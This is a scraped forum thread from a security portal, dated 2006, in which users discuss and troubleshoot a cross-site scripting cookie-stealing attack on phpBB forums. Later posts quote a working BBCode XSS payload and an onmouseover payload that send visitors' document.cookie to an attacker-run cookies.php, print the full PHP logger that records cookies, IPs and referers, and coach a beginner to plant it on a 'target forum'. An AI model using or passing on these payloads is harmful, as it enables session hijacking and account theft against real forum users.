Waraxe IT Security Portal
Login or Register
August 21, 2026
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 343
Members: 0
Total: 343
Full disclosure
[0day-rubbish] VMS 6.48.809 Authenticated command injection to root RCE (8.8)
[0day-rubbish] ONE Reporter 13.1 Authenticated RCE / privilege escalation via CommandExecutor (8.8)
[0day-rubbish] Gemini 7.3.0 Authenticated SQL injection to xp_cmdshell RCE (8.8)
[0day-rubbish] RoboTask 11.0.5.1229 Unauthenticated REST API remote task execution (9.8)
[0day-rubbish] ActiveFax Server 10.70 Unauthenticated LPD Ghostscript %pipe% SYSTEM RCE (9.8)
[0day-rubbish] Tornado 2.11.3 Unauthenticated arbitrary file write to root RCE (storeTo=file: to cron) (9.8)
[0day-rubbish] Datalore On-Premises 2026.2.3 Unauthenticated RCE via InteractiveReport access-mapping flaw (9.8)
APPLE-SA-08-18-2026-1 Safari 26.6.1
Cudy WR3000: Hard-coded JWT Secret to Root Command Injection
Security advisory: Pre-authentication RCE (SQL injection) in XPressEntry 3.7.7454 (Telaeris Inc)
Security advisory: Authenticated RCE (SQL injection) in Scrutinizer 19.7.0 (Plixer)
Security advisory: Pre-authentication SYSTEM RCE (Zip-Slip plugin planting) in Output Messenger Server 2.0.x (>= 2.0.63) (Srimax Software (Output Technology))
Security advisory: Pre-authentication RCE (arbitrary file write) in RapidDeploy 5.2.2 (MidVision)
Security advisory: Authenticated RCE (second-order SQL injection) in Lansweeper 12.2.1.0 (web reports 12.2.1.6) (Lansweeper)
Security advisory: Authenticated RCE (command injection) in Kerio Connect 10.0.9 Patch 2 (build 10320) (GFI Software)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> l Goto page 1, 2Next
Post new topicReply to topic View previous topic :: View next topic
l
PostPosted: Fri Feb 10, 2006 6:14 pm Reply with quote
oobiingzoo
Beginner
Beginner
Joined: Feb 10, 2006
Posts: 4




fjjj


Last edited by oobiingzoo on Thu Sep 28, 2006 5:28 pm; edited 1 time in total
View user's profile Send private message
PostPosted: Sat Feb 11, 2006 6:56 am Reply with quote
subzero
Valuable expert
Valuable expert
Joined: Mar 16, 2005
Posts: 42




btw what money are you talking about...

http://kisobox.com/exploits/phpbb.2.0.17.xss+cookies.stealer.txt

well have fun Laughing
View user's profile Send private message Visit poster's website
PostPosted: Sat Feb 11, 2006 6:10 pm Reply with quote
oobiingzoo
Beginner
Beginner
Joined: Feb 10, 2006
Posts: 4




hh


Last edited by oobiingzoo on Thu May 17, 2007 4:33 am; edited 1 time in total
View user's profile Send private message
PostPosted: Sun Feb 12, 2006 1:04 am Reply with quote
is0t0pe
Regular user
Regular user
Joined: Jan 10, 2006
Posts: 13




I think its against the rules to pay people real money to hack sites...
View user's profile Send private message
PostPosted: Sun Feb 12, 2006 1:52 am Reply with quote
subzero
Valuable expert
Valuable expert
Joined: Mar 16, 2005
Posts: 42




thats his problem to make real or fake money for hacking. Wink
point is exploits with greater version number are spread in the wild,tell me why you go for this later version? Laughing
View user's profile Send private message Visit poster's website
PostPosted: Sun Feb 12, 2006 3:33 am Reply with quote
oobiingzoo
Beginner
Beginner
Joined: Feb 10, 2006
Posts: 4




bgg


Last edited by oobiingzoo on Thu May 17, 2007 4:34 am; edited 1 time in total
View user's profile Send private message
PostPosted: Sun Feb 12, 2006 11:53 am Reply with quote
syntax9
Active user
Active user
Joined: Dec 21, 2005
Posts: 33




check your pm's ><
View user's profile Send private message
PostPosted: Mon Feb 13, 2006 1:37 pm Reply with quote
oobiingzoo
Beginner
Beginner
Joined: Feb 10, 2006
Posts: 4




gggg


Last edited by oobiingzoo on Thu May 17, 2007 4:34 am; edited 1 time in total
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 12:28 pm Reply with quote
Bill324
Regular user
Regular user
Joined: Apr 07, 2006
Posts: 11




subzero wrote:


http://kisobox.com/exploits/phpbb.2.0.17.xss+cookies.stealer.txt


On there it has a script,

Quote:
[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'


cookies.php

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('log.txt', 'a');
fwrite($fp,
'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>


How do I use this Laughing Do I fill in the gaps with my website or the website im attempting to get.
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 2:19 pm Reply with quote
Aryan-Husky
Active user
Active user
Joined: Apr 03, 2006
Posts: 37




Upload the php as a file called cookies.php to your webserver and then call it in a post on a target forum. Watch the video on kisobox.
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 5:11 pm Reply with quote
Bill324
Regular user
Regular user
Joined: Apr 07, 2006
Posts: 11




Ok this confuses me, I have viewed the video.

And Have tried to follow as best as I could here is what happens:

1. I copied that script and placed it as cookies.php on the server.

2. Then I attempted to post this in a thread on my forum (Im testing it),

Code:
<pre a=">" onmouseover='document.location="http://localhost/cookies.php?c="+document.cookie' b="<pre" >
[img]http://www.punchstock.com/image/imagesource/4794232/large/is29020.jpg[/img]


But, when I do I get just a blank post. All html is enabled and that, I have changed the code:

Code:
http://localhost/cookies.php


To my new cookies file.

So, basically the post comes up blank, NO IMAGE whatsoever.

Any ideas plz? Very Happy [/code]
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 10:41 pm Reply with quote
sljyro
Advanced user
Advanced user
Joined: Mar 23, 2006
Posts: 53




well it looks like you're doing everything fine.

i would suggest for you to test it online, just go to the target board, and test it by 'preview' post on yourself, and if you get redirected, check your log.txt if the details have been logged. then its all fine!
View user's profile Send private message
PostPosted: Sat Apr 08, 2006 7:05 am Reply with quote
Bill324
Regular user
Regular user
Joined: Apr 07, 2006
Posts: 11




Where is my log.txt Shocked I didnt make one, I just have my cookies.php Embarassed
View user's profile Send private message
PostPosted: Sun Apr 09, 2006 1:10 am Reply with quote
sljyro
Advanced user
Advanced user
Joined: Mar 23, 2006
Posts: 53




in cookies.php there is this code
Code:
$fp = fopen('log.txt', 'a');


so yeah, make a log.txt or any .txt file and change the code Smile
View user's profile Send private message
PostPosted: Sun Apr 09, 2006 7:59 am Reply with quote
Bill324
Regular user
Regular user
Joined: Apr 07, 2006
Posts: 11




Where shall I put my log. On the server? Shocked
View user's profile Send private message
l
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 2
Goto page 1, 2Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.043 Seconds